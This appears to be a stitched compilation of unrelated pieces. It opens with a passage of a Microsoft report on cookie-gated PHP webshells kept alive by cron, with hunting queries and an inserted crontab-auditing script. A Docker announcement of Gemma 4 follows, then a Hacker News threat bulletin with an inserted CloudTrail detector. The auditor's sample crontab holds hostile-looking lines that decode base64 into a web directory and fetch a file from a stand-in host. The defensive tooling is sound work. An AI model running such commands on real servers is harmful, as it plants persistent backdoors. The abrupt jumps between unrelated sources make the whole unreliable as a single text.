As illustrated in the diagram, the cron job executed at regular intervals and invoked a shell routine that reconstructed an obfuscated PHP loader into a web-accessible location. This behavior was intentionally implemented to maintain persistence. If the loader was removed, the scheduled task recreated it on the next execution cycle. The job also applied restrictive file permissions, making manual modification or removal more difficult during incident response.
This “self-healing” mechanism, controlled by the threat actor, allowed the malicious file to reappear after cleanup attempts, complicating remediation and enabling a more stable foothold within the affected hosting account.
Once deployed, the PHP loader followed the same low-visibility pattern described earlier. It remained inactive during normal traffic and activated only when specific cookie conditions were met. On activation, it dynamically rebuilt functionality at runtime and transferred execution to threat actor–controlled logic. By separating persistence through cron-based re-creation from execution control through cookie-gated activation, the threat actor reduced operational noise and limited observable indicators in routine application logs.
Commonalities and delivery methods
Across the activity analyzed, a consistent operational pattern emerged. While individual implementations varied in structure, each relied on multi-layer obfuscation to conceal sensitive functionality and cookie-gated execution to control activation. Under routine traffic conditions, the scripts remained dormant. Only when specific cookie values were supplied did the malicious logic reconstruct and execute. Whether deployed as a staged loader or an interactive webshell, the objective remained consistent: controlled activation with minimal observable footprint.
The delivery mechanism followed a similarly deliberate design. In multiple environments, web-facing processes such as php-fpm spawned shell commands that reconstructed obfuscated PHP files using the recognizable echo | base64 -d > file.php pattern. In other cases, equivalent commands were executed within restricted shell environments, such as through cPanel jailshell, or established via scheduled tasks at the hosting account level.
Rather than relying on complex exploit chains, the threat actor leveraged legitimate execution paths already present in the environment, including web server processes, control panel components, and cron infrastructure, to stage and preserve malicious code. The repeated use of base64 reconstruction combined with multi-layer runtime obfuscation separated deployment, concealment, and activation into distinct phases. This layered design allowed the malicious code to blend into normal operational activity while maintaining reliable remote code execution.
In the attacks analyzed, persistence was deliberate, not incidental. Rather than depending on a single exploit or a short-lived foothold, the threat actor turned initial access into a repeatable mechanism for remote code execution (RCE). By combining scheduled tasks with obfuscated PHP loaders, they preserved the ability to execute code even after the original entry point was remediated or access paths were disrupted.
Persistent RCE provides long-term flexibility. It allows threat actors to return on demand to run additional commands, deploy follow-on payloads, alter application behavior, or pivot to other resources without repeatedly re-triggering the same exploit chain. This reduces operational risk and can limit the number of noisy intrusion attempts that might otherwise raise alerts.
In shared hosting environments, account-level access is often sufficient to create scheduled tasks, modify web content, and run arbitrary PHP within the affected site’s boundaries. When execution is further protected behind cookie-gated activation, the malicious logic can remain dormant during routine activity and activate only when the threat actor supplies the correct input. Over time, this durable access can support data theft, expansion to adjacent applications, or compromise of connected services, often with minimal visible disruption.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of PHP webshell–based compromises discussed in this report. These recommendations build on established guidance from previous Microsoft Defender research and align with protections available across Microsoft Defender XDR to help organizations prevent, detect, and respond to post-compromise web shell activity targeting web servers and application workloads.
Strengthen Hosting Account Security
Enforce multi-factor authentication for hosting control panels, SSH access, and administrative interfaces. Monitor for unusual login activity, particularly from unfamiliar IP addresses or geographies, as compromised account credentials are often sufficient to deploy webshells and create persistence mechanisms.
Restrict Web Server Process Execution
Limit the ability of web‑facing services such as php‑fpm or application worker workloads to spawn shell processes. Restrict the execution of shell interpreters (sh, bash, dash) and commonly abused encoding or file ingress utilities such as base64, curl, and wget from web server execution contexts unless they are explicitly required by the application.
Advanced Hunting can be used to surface cases where web server workloads spawn shell interpreters or execute encoded or file‑retrieval commands, as these patterns provide high‑signal indicators of webshell execution and command injection attempts.
Audit and Monitor Scheduled Tasks
Regularly review account‑level cron jobs and scheduled tasks across web servers and application hosts. Unexpected entries that invoke shell commands or write files into web‑accessible directories may indicate persistence mechanisms used to deploy, restore, or re‑activate malicious webshell loaders.
Advanced Hunting can be used to identify cron‑initiated execution patterns, including unusually short execution intervals (for example, recurring one‑minute jobs) and command lines associated with file creation, script execution, encoding utilities, or file ingress tools. These behaviours are commonly observed during web shell persistence and recovery activity following initial compromise.
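For hosts where crontabs can be read at rest, the same review can be scripted. The following is an added example, not part of the report: it parses crontab text and flags entries that decode base64 into a web path, fetch files into a web path, change permissions, or run at short intervals. The regexes, the twelve-runs-per-hour threshold, the function names, and the sample crontab are assumptions constructed for illustration.

```python
import re

# Heuristics chosen for this example (assumptions, not the report's logic).
DECODE = re.compile(r"\bbase64\s+(?:-d|--decode)\b")
WRITE_TARGET = re.compile(r"(?:>>?|\btee\s+(?:-a\s+)?)\s*(\S+)")
WEB_PATH = re.compile(r"public_html|/var/www|htdocs|\.php\b")
INGRESS = re.compile(r"\b(?:curl|wget)\b")
CHMOD = re.compile(r"\bchmod\b")
ENV_LINE = re.compile(r"^[A-Za-z_]\w*\s*=")
SHORT_INTERVAL_RUNS = 12  # 12+ runs per hour, i.e. every five minutes or less


def runs_per_hour(minute_field):
    """Count the distinct minutes matched by a crontab minute field."""
    minutes = set()
    for part in minute_field.split(","):
        m = re.fullmatch(r"(\*|\d+(?:-\d+)?)(?:/(\d+))?", part)
        if not m:
            return 0
        step = int(m.group(2) or 1)
        if step == 0:
            return 0
        if m.group(1) == "*":
            lo, hi = 0, 59
        elif "-" in m.group(1):
            lo, hi = (int(x) for x in m.group(1).split("-"))
        else:
            lo = int(m.group(1))
            hi = 59 if m.group(2) else lo
        minutes.update(range(lo, min(hi, 59) + 1, step))
    return len(minutes)


def audit_line(line):
    """Return a finding dict for one crontab line, or None if unremarkable."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    if line.startswith("@"):               # @reboot, @hourly, ...
        parts = line.split(None, 1)
        if len(parts) < 2:
            return None
        command, short = parts[1], False
    else:
        parts = line.split(None, 5)
        if len(parts) < 6:
            return None
        minute, hour, command = parts[0], parts[1], parts[5]
        short = hour == "*" and runs_per_hour(minute) >= SHORT_INTERVAL_RUNS

    reasons = []
    if DECODE.search(command):
        reasons.append("base64_decode")
    if any(WEB_PATH.search(t) for t in WRITE_TARGET.findall(command)):
        reasons.append("web_write")
    if INGRESS.search(command) and WEB_PATH.search(command):
        reasons.append("ingress_to_web")
    if CHMOD.search(command):
        reasons.append("chmod")
    if short:
        reasons.append("short_interval")

    # An interval or chmod alone is normal (framework schedulers run every
    # minute); only report when content is being written into a web path.
    if not {"base64_decode", "web_write", "ingress_to_web"} & set(reasons):
        return None
    high = {"base64_decode", "web_write"} <= set(reasons)
    return {"severity": "high" if high else "review",
            "reasons": reasons, "command": command}


def audit_crontab(text):
    """Audit crontab text; findings carry their 1-based line number."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        finding = audit_line(line)
        if finding:
            finding["line"] = number
            findings.append(finding)
    return findings


# Constructed sample crontab; paths, host name and the blob are placeholders.
SAMPLE_CRONTAB = """\
# account "example"
MAILTO=""
* * * * * cd /home/example/app && php artisan schedule:run >/dev/null 2>&1
0 3 * * * /usr/bin/php /home/example/public_html/cron.php >/dev/null 2>&1
* * * * * echo 'QkxPQg==' | base64 -d > /home/example/public_html/inc.php; chmod 444 /home/example/public_html/inc.php
*/30 * * * * wget -q -O /home/example/public_html/up.php https://files.example.invalid/a
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f["line"], f["severity"], ",".join(f["reasons"]))
```

The two legitimate jobs in the sample (a one-minute framework scheduler and a nightly PHP script) are deliberately not reported, which keeps the output focused on entries that write content into web-accessible paths.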
Inspect Suspicious File Creation in Web Directories
Focus on suspicious content deployment into web directories by monitoring the command‑line techniques used to write or retrieve files, rather than relying on file creation telemetry alone. Attackers frequently deploy PHP web shells by decoding obfuscated payloads inline (for example, using echo piped to base64 -d with output redirection) or by downloading scripts via file ingress tools such as curl or wget from web server or application execution contexts.
Advanced Hunting can be used to identify these behaviors by querying process execution events for decoding pipelines, redirection operators, or network retrieval utilities associated with web-facing workloads, providing high‑signal visibility into webshell deployment activity.
Limit Control Panel Shell Capabilities
Where hosting control panels are used, restrict or disable shell access such as jailshell wherever possible. If shell access is required, enforce strict access controls and closely monitor command execution to reduce the risk of attackers abusing these environments to deploy or interact with malicious PHP loaders and webshells.
Advanced hunting queries that track command execution from control panel restricted shells can help identify abuse patterns in which attackers leverage legitimate hosting features to maintain access or execute post-compromise tooling.
Microsoft recommends the following mitigations to reduce the impact of this threat in Linux environments protected by Microsoft Defender for Endpoint:
Enable cloud-delivered protection in Microsoft Defender for Endpoint on Linux or the equivalent capability in your antivirus solution. Cloud-based protection helps rapidly detect and block emerging attacker tools, including newly deployed PHP webshells and post-compromise scripts that may evade traditional signature-based detection.
Ensure real-time protection is enabled on Linux servers to continuously scan files written to disk, including web directories commonly targeted during PHP web shell deployment (such as /var/www, application upload paths, and temporary directories).
Enable behaviour monitoring to detect suspicious runtime activity associated with webshell abuse, such as anomalous child processes spawned by web server processes, execution of system utilities from PHP interpreters, credential access attempts, or data staging and exfiltration behaviours.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence. Security teams can leverage Copilot to assist with the analysis and interpretation of obfuscated or heavily encoded scripts, helping accelerate triage and improve understanding of attacker tradecraft during web shell and post-compromise investigations.
| Tactic | Observed activity | Microsoft Defender coverage |
| --- | --- | --- |
| Initial Access, Execution, Defense Evasion | An obfuscated or encoded script is executed by the cron service, indicating suspicious scheduled execution activity potentially used to bypass direct user interaction and evade detection. | Microsoft Defender for Endpoint: Suspicious script launched, Suspicious shell command execution, Suspicious file and directory permission modification |
| Execution, Persistence | A new cron job is created by a hosting control panel process (such as cPanel), to establish persistence by scheduling recurring execution of attacker-controlled commands or scripts without further user interaction. | Microsoft Defender for Endpoint: Suspicious cron job, Suspicious execution of elevated process |
| Persistence | A PHP file (for example, index.php) is dropped or modified in a web-accessible directory, suggesting the deployment of a server-side script that may be used to execute arbitrary commands or maintain long-term access to the web server. | Microsoft Defender for Endpoint: Possible Web Server compromise activity |
| Persistence | A PHP webshell file (such as index.php) is written to disk and identified as active malware, indicating confirmation of server-side backdoor deployment intended for remote command execution via HTTP requests. | Microsoft Defender Antivirus: An active ‘Webshell’ malware was blocked, ‘WebShell’ malware was prevented, An active ‘Obfuse’ malware was blocked |
Microsoft Security Copilot prompts
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Microsoft Defender XDR threat analytics
Advanced Hunting queries
Web Server Spawning Shell
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("php-fpm", "httpd", "apache2", "nginx")
| where FileName in~ ("bash", "sh", "dash")
| project Timestamp, DeviceName, AccountName,
InitiatingProcessFileName, InitiatingProcessCommandLine,
FileName, ProcessCommandLine, FolderPath
| order by Timestamp desc
Base64 Decode Writing PHP File
DeviceProcessEvents
| where FileName in~ ("bash", "sh", "dash", "jailshell")
| where ProcessCommandLine has "base64"
| where ProcessCommandLine has ".php"
| project Timestamp, DeviceName, AccountName,
ProcessCommandLine,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by Timestamp desc
tee Writing PHP Files
DeviceProcessEvents
| where ProcessCommandLine has "tee"
| where ProcessCommandLine has ".php"
| project Timestamp, DeviceName, AccountName,
InitiatingProcessFileName,
ProcessCommandLine
| order by Timestamp desc
cPanel / jailshell Abuse
DeviceProcessEvents
| where FileName in~ ("jailshell", "cpanel")
| project Timestamp, DeviceName, AccountName,
FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
High-Risk Combined Pattern
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("php-fpm", "httpd", "apache2", "nginx", "cron", "crond")
| where ProcessCommandLine has "base64"
| where ProcessCommandLine has_any (".php", "public_html", "vendor")
| project Timestamp, DeviceName, AccountName,
InitiatingProcessFileName,
ProcessCommandLine
| order by Timestamp desc
Unexpected Shell from Backend Workers
DeviceProcessEvents
| where InitiatingProcessCommandLine has_any ("artisan", "queue:work", "fwconsole")
| where FileName in~ ("bash", "sh", "dash")
| project Timestamp, DeviceName,
InitiatingProcessCommandLine,
ProcessCommandLine
| order by Timestamp desc
Repeated Execution Pattern (1-Minute Cron)
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("cron", "crond")
| summarize count() by DeviceName, ProcessCommandLine, bin(Timestamp, 1m)
| where count_ > 10
| order by count_ desc
MITRE ATT&CK™ Techniques observed
This campaign exhibited the following MITRE ATT&CK™ techniques across multiple tactics. For detailed detection and prevention capabilities, see the Microsoft Defender XDR Detections section below.
| Tactic | Technique ID | Technique Name | How it Presents in This Campaign |
| --- | --- | --- | --- |
| Initial Access | T1190 | Exploit Public-Facing Application | Attackers gain access through exposed web applications or hosting environments and use that access to introduce server-side tooling that blends into the web stack. |
| Persistence | T1505.003 | Server Software Component: Web Shell | A PHP webshell is placed in a web-accessible location and designed to remain dormant during normal traffic, enabling long-term access through web requests. |
| Defense Evasion | T1027 | Obfuscated/Encrypted File or Information | Payloads and scripts are obfuscated or encoded (for example, high-entropy strings and base64-encoded blobs) to reduce inspection and evade simple content-based detections. |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | Attackers decode inline payloads at runtime, such as echo <blob> \| base64 -d > <file> to reconstruct PHP content on disk with minimal interactive footprint. |
| Command and Control | T1105 | Ingress Tool Transfer | Additional files or second-stage scripts are retrieved using file ingress utilities such as curl or wget, often writing directly into web directories or application paths. |
| Execution | T1059.004 | Command and Scripting Interpreter: Unix Shell | Web-facing workloads (for example, php-fpm, apache2, nginx) spawn shell interpreters (sh, bash, dash) to execute attacker-provided commands from webshell logic or injected requests. |
| Persistence | T1053.003 | Scheduled Task/Job: Cron | Persistence is established via cron, including jobs created by hosting tooling (for example, cPanel) and recurring execution patterns (including short intervals such as one-minute loops). |
| Defense Evasion | T1222.002 | File and Directory Permissions Modification | File or directory permissions are modified to enable write/execute access in web paths or to ensure persistence artifacts remain accessible to the compromised runtime context. |
This research is provided by Microsoft Defender Security Research with contributions from Yashashree Gund and other members of Microsoft Threat Intelligence.
Learn more
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
Docker Hub is quickly becoming the home for AI models, serving millions of developers and bringing together a curated lineup that spans lightweight edge models to high-performance LLMs, all packaged as OCI artifacts.
Today, we’re excited to welcome Gemma 4, the latest generation of lightweight, state-of-the-art open models. Built on the same technology behind Gemini, Gemma 4 introduces three architectures that scale from low-power efficiency to high-end server performance.
By packaging models as OCI artifacts, models behave just like containers. They become versioned, shareable, and instantly deployable, with no custom toolchains required. You can pull ready-to-run models from Docker Hub, push your own, integrate with any OCI registry, and plug everything directly into your existing CI/CD pipelines using familiar tooling for security, access control, and automation.
And this is just the start. Over the next few weeks, Gemma 4 support is coming to Docker Model Runner, so you will not just discover models on Hub, you will be able to run, manage, and deploy them directly from Docker Desktop with the same simplicity you expect from Docker.
Docker Hub’s growing GenAI catalog already includes popular models like IBM Granite, Llama, Mistral, Phi, and SolarLLM, alongside apps like JupyterHub and H2O.ai, plus essential tools for inference, optimization, and orchestration.
What Docker Brings to Gemma 4
Gemma 4 expands what efficient, high-performance models can do. Docker makes them simple to run, share, and scale anywhere.
Run efficiently at the edge: Smaller Gemma 4 variants are optimized for on-device performance. Docker enables consistent deployment across laptops, edge devices, and local environments.
Scale performance with ease: From sparse to dense architectures, you can run any model like a container, making it easy to scale across cloud or on-prem infrastructure.
One command to get started: Gemma 4 is just one command away:
docker model pull gemma4
No proprietary download tools. No custom authentication flows. Just the same pull, tag, push, and deploy workflow you already use.
By bringing Gemma 4 to Docker Hub, you get powerful models with a familiar, production-ready workflow.
What’s New in Gemma 4?
Gemma 4 redefines what “small” models can do, with architectures optimized across multiple sizes and use cases:
Small & Efficient (E2B, E4B): Built for on-device performance with high throughput and low memory use.
Flagship Dense (31B): High-performance model with a 256K context window for long-context reasoning.
Key capabilities include multimodal support (text, image, audio), advanced reasoning with “thinking” tokens, and strong coding plus function-calling abilities.
Technical Specifications
| Model Name | Type | Total Params | Input Modalities | Context Window |
| --- | --- | --- | --- | --- |
| Gemma 4 E2B | Dense (Small) | 5.1B | Text, Vision, Audio | 128K |
| Gemma 4 E4B | Dense (Small) | 8.0B | Text, Vision, Audio | 128K |
| Gemma 4 26B A4B | MoE | 26.8B (3.8B active) | Text, Vision | 256K – 512K |
| Gemma 4 31B | Dense | 31.3B | Text, Vision | 256K – 512K |
Build the Future of AI with Docker Hub
The arrival of Gemma 4 on Docker Hub reinforces our commitment to making Docker Hub the best place to discover, share, and run AI models. Whether you are building a voice-activated mobile assistant or a large-scale document retrieval system, Docker Hub makes it simple to find the right model, pull it instantly, and run it anywhere.
The latest ThreatsDay Bulletin is basically a cheat sheet for everything breaking on the internet right now. No corporate fluff or boring lectures here, just a quick and honest look at the messy reality of keeping systems safe this week.
Things are moving fast. The list includes researchers chaining small bugs together to create massive backdoors, old software flaws coming back to haunt us, and some very clever new tricks that let attackers bypass security logs entirely without leaving a trace. We are also seeing sketchier traffic on the underground and the usual supply chain mess, where one bad piece of code threatens thousands of apps.
It is definitely worth a quick scan before you log off for the day, if only to make sure none of this is sitting in your own network. Let's get into it.
watchTowr Labs has disclosed two security flaws in Progress ShareFile (CVE-2026-2699 and CVE-2026-2701) that could be chained to achieve pre-authenticated remote code execution. While CVE-2026-2699 is an authentication bypass via the "/ConfigService/Admin.aspx" endpoint, CVE-2026-2701 refers to a case of post-authenticated remote code execution. An attacker could combine the two vulnerabilities to sidestep authentication and upload web shells. Progress fixed the vulnerabilities in Storage Zone Controller 5.12.4, released on March 10, 2026. There are about 30,000 internet-facing instances, making patching against the flaws crucial.
A new Android malware named NoVoice has been distributed via more than 50 apps that were downloaded at least 2.3 million times. While apps masqueraded as utilities, image galleries, and games, and offered the advertised functionality, the malware attempted to obtain root access on the device by exploiting 22 Android vulnerabilities that received patches between 2016 and 2021. "If the exploits succeed, the malware gains full control of the device," McAfee Labs said. "From that moment onward, every app that the user opens is injected with attacker-controlled code. This allows the operators to access any app data and exfiltrate it to their servers." The malware avoids infecting devices in certain regions, like Beijing and Shenzhen in China, and implements more than a dozen checks for emulators, debuggers, and VPNs. It then contacts a remote server to send device information and fetch appropriate exploits to gain root access and disable SELinux. Upon gaining elevated access, the rootkit modifies system libraries to facilitate the execution of malicious code when specific apps are opened, install arbitrary apps, and enable persistence. NoVoice has been found to share some level of overlap with Triada. One of the targeted apps is WhatsApp, which enabled the malware to harvest data from the app as soon as it was launched. Google has since removed the apps. The highest concentration of infections has been reported in Nigeria, Ethiopia, Algeria, India, and Kenya.
The U.S. Federal Bureau of Investigation (FBI) is warning of the data security risks associated with foreign-developed mobile applications. "As of early 2026, many of the most downloaded and top-grossing apps in the United States are developed and maintained by foreign companies, particularly those based in China," the FBI said. "The apps that maintain digital infrastructure in China are subject to China's extensive national security laws, enabling the Chinese government to potentially access mobile app users' data." The bureau also warned that these apps may harvest contact information under the pretext of inviting friends to use them, store personal data in Chinese servers, or contain malware that could collect data beyond what is authorized by the user. "This could include malicious code and hard-to-remove malware designed to exploit known vulnerabilities in various operating systems and insert a backdoor for escalated privileges, such as enabling the download and execution of additional malicious packages designed to provide unauthorized access to users' data," it added. The FBI did not name the apps, but TikTok, Shein, Temu, and DeepSeek fit the profile.
The U.S. State Department has officially launched the Bureau of Emerging Threats, a new unit tasked with protecting U.S. national security from cyber attacks on critical infrastructure, threats in the space domain, and misuse of artificial intelligence (AI) and other advanced technology risks from Iran, China, Russia, and North Korea.
Li Xiong, the former chairman of a Cambodian financial conglomerate, HuiOne, has been extradited to China. He has been accused of operating gambling dens, fraud, unlawful business operations, and money laundering. According to Xinhua, Li is said to be a key member of the transnational cybercrime syndicate masterminded by Chen Zhi, the chairman of Prince Group, who was extradited to China in January 2026 and has been indicted by the U.S. for operating large-scale, forced-labor "pig butchering" scam compounds in Southeast Asia. In May 2025, the U.S. Treasury's Financial Crimes Enforcement Network labeled Huione Group "a financial institution of primary money laundering concern."
Google said it's rolling out the ability to change a username to Google Account users in the U.S. "Your previous Google Account email ending in gmail.com will become an alternate email address," Google said in a support document. "You'll receive emails to both your old and new addresses. The data saved in your account won’t be affected. This includes things like photos, messages, and emails sent to your previous email address." While users can change back to their previous email address at any time, it's not possible to create a new Google Account email ending in gmail.com for the next 12 months. The new email address cannot be deleted either.
A U.S. federal judge has temporarily blocked the Trump administration's designation of Anthropic as a supply chain risk. The AI company had argued that the designation was causing immediate and irreparable harm. "Nothing in the governing statute supports the Orwellian notion that an American company may be branded a potential adversary and saboteur of the U.S. for expressing disagreement with the government," District Judge Rita Lin wrote in the ruling.
Cybercriminals have set their sights on Android users through a new phishing scheme that disguises malicious applications as beta-testing opportunities for ChatGPT and Meta advertising tools. In these attacks, what appears to be an invitation to advertising apps turns out to be a carefully planned attempt to steal Facebook credentials and hijack control of user accounts. "These messages push malicious apps delivered through 'firebase-noreply@google.com' via Firebase App Distribution, a legitimate Google service for distributing pre-release apps to testers," LevelBlue said. "Once installed, these apps request Facebook credentials, leading to phishing and account takeover." A similar campaign has leveraged phishing emails impersonating ChatGPT and Gemini to push users into downloading malicious iOS apps from the Apple App Store. "Disguised as business or ad management tools, these apps prompt for Facebook credentials, leading to credential harvesting," the company added.
Google has made ransomware detection and file restoration in Drive generally available after launching the feature in beta in September 2025 to help organizations minimize the impact of malware attacks on personal computers. Ransomware detection pauses file syncing, and file restoration allows users to bulk restore their files to a previous version in Drive. "Compared to when the feature was in beta, we are now able to detect even more types of ransomware encryption and are able to do it faster," Google said. "Our latest AI model is detecting 14x more infections, leading to even more comprehensive protection."
Cybersecurity company Darktrace said it has observed a steady increase in GhostSocks activity across its customer base since late 2025. "In one notable case from December 2025, Darktrace detected GhostSocks operating alongside Lumma Stealer, reinforcing that the partnership between Lumma and GhostSocks remains active despite recent attempts to disrupt Lumma's infrastructure," it said. Originally marketed on the Russian underground forum xss[.]is as a malware-as-a-service (MaaS), GhostSocks enables threat actors to turn compromised devices into residential proxies, leveraging the victim's internet bandwidth to route malicious traffic through it. It utilizes the SOCKS5 proxy protocol, creating a SOCKS5 connection on infected devices. It began to be widely adopted following its partnership with Lumma Stealer in 2024.
The number of malware advisories across open-source ecosystems has increased 13.6x since January 2024, as threat actors take control of trusted packages to poison the software supply chain. "Of the 1,011 npm ATO [Account takeover] advisories recorded in the OSV database over all time, 930 were filed in 2025, a roughly 12x year-over-year increase representing 92% of all ATOs reported on npm," Endor Labs said. Among the 2025 npm ATO cases, 38.4% of affected packages had more than 1,000 monthly downloads, 18.5% exceeded 10,000, and 11.1% had more than 100,000. "Attackers are deliberately targeting packages that are deeply embedded in production systems and automated CI/CD pipelines, maximizing the blast radius of each compromise."
An updated version of the XLoader information-stealing malware (version 8.7) has been found to incorporate several changes to the code obfuscation to make automation and analysis more difficult. These include the use of encrypted strings that are decrypted at runtime, encrypted code blocks consisting of functions that are decrypted at runtime, and improved methods to conceal hard-coded values and specific functions, per Zscaler. XLoader also uses a combination of multiple encryption layers with different keys for encrypting network traffic. "XLoader continues to be a highly active information stealer that constantly receives updates," the company said. "As a result of the malware's multiple encryption layers, decoy C2 servers, and robust code obfuscation, XLoader has been able to remain largely under the radar."
Cybersecurity researchers have found multiple zero-day vulnerabilities in ImageMagick that could be chained to achieve remote code execution through a single image or PDF upload. According to Pwn.ai, the attack works on the default configuration and the most restrictive "secure" configuration. The issue affects every major Linux distribution, as well as WordPress installations that process image uploads. It remains unpatched as of writing. In the interim, it's advised to process PDFs in an isolated sandbox with no network access, disable XML-RPC in WordPress, and block GhostScript.
Adversaries are bypassing traditional CloudTrail detections, like StopLogging or DeleteTrail, and instead using lesser-known AWS APIs to blind logging systems. This includes creating "invisible activity zones" using PutEventSelectors, using StopEventDataStoreIngestion and DeleteEventDataStore to halt or destroy long-term forensic visibility, disabling anomaly detection via PutInsightSelectors, and neutralizing cross-account protections through DeleteResourcePolicy and DeregisterOrganizationDelegatedAdmin. "The real risk is in the sequence: individually, these API calls look like routine maintenance—but chained together, they allow attackers to erase evidence and evade detection entirely," Abstract Security said.
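The sequence point above can be turned into a detection. The following is an added example (not code from Abstract Security or The Hacker News) that correlates the named CloudTrail API calls per principal inside a time window. It assumes CloudTrail's `eventTime`, `eventSource`, `eventName` and `userIdentity.arn` record fields; the sample records, ARNs, the 60-minute window and the three-call threshold are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# API names from the paragraph above; all are CloudTrail's own management APIs.
CT = "cloudtrail.amazonaws.com"
BLINDING_APIS = {
    "StopLogging", "DeleteTrail", "PutEventSelectors", "PutInsightSelectors",
    "StopEventDataStoreIngestion", "DeleteEventDataStore",
    "DeleteResourcePolicy", "DeregisterOrganizationDelegatedAdmin",
}

def parse_time(value):  # eventTime is ISO 8601 UTC, e.g. 2026-03-30T10:02:11Z
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")

def find_blinding_chains(records, window_minutes=60, min_distinct=3):
    """One finding per principal calling >= min_distinct distinct APIs in the window."""
    window = timedelta(minutes=window_minutes)
    per_principal = defaultdict(list)
    for rec in records:
        # DeleteResourcePolicy also exists in other services, so pin the event source.
        if rec.get("eventSource") != CT or rec.get("eventName") not in BLINDING_APIS:
            continue
        arn = rec.get("userIdentity", {}).get("arn", "unknown")
        per_principal[arn].append((parse_time(rec["eventTime"]), rec["eventName"]))
    findings = []
    for arn, calls in per_principal.items():
        calls.sort()
        start = 0
        for end in range(len(calls)):
            while calls[end][0] - calls[start][0] > window:
                start += 1  # slide the window start forward
            names = sorted({name for _, name in calls[start:end + 1]})
            if len(names) >= min_distinct:
                findings.append({"principal": arn, "last": calls[end][0], "apis": names})
                break  # one alert per principal
    return findings

# Constructed sample records (not real logs), trimmed to the fields used.
OPS = "arn:aws:iam::111122223333:user/ops-admin"
CI = "arn:aws:sts::111122223333:assumed-role/ci-deploy/session1"
SAMPLE = [{"eventTime": f"2026-03-30T{t}Z", "eventSource": src, "eventName": name,
           "userIdentity": {"arn": arn}} for t, name, arn, src in [
    ("09:00:00", "PutEventSelectors", OPS, CT),
    ("10:02:11", "PutEventSelectors", CI, CT),
    ("10:05:40", "PutInsightSelectors", CI, CT),
    ("10:07:00", "DeleteResourcePolicy", CI, "secretsmanager.amazonaws.com"),
    ("10:09:03", "StopEventDataStoreIngestion", CI, CT),
    ("10:15:00", "DeleteEventDataStore", CI, CT),
]]
```

A single `PutEventSelectors` call by the constructed `ops-admin` user produces no finding, while the `ci-deploy` session is flagged at its third distinct call; tune the window and threshold against your own change-management baseline.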
The threat actor known as LofyGang resurfaced with a fake npm package ("undicy-http") that delivers a dual-payload attack: a Node.js-based Remote Access Trojan (RAT) with live screen streaming, and a native Windows PE binary that uses direct syscalls to inject into browser processes and steal credentials, cookies, credit cards, IBANs, and session tokens from more than 50 web browsers and 90 cryptocurrency wallet extensions. The session hijacking module targets Roblox, Instagram, Spotify, TikTok, Steam, Telegram, and Discord. "The Node.js layer independently operates as a full RAT with remote shell, screen capture, webcam/microphone streaming, file upload, and persistence capabilities, all controlled through a WebSocket C2 panel," JFrog said. The Node.js layer also downloads a native PE binary to facilitate data exfiltration via a Discord webhook and a Telegram bot.
Nothing here looks huge on its own. That’s the point. Small changes, repeated enough times, start to matter. Things that used to be hard are getting easier. Things that were noisy are getting quiet. You stop seeing the obvious signs and start missing the subtle ones.
Read it like a pattern, not a list. Same ideas showing up in slightly different forms. Systems doing what they’re designed to do—just used differently. That gap is where most problems live now. That’s the recap.
from The Hacker News https://ift.tt/IgpZ458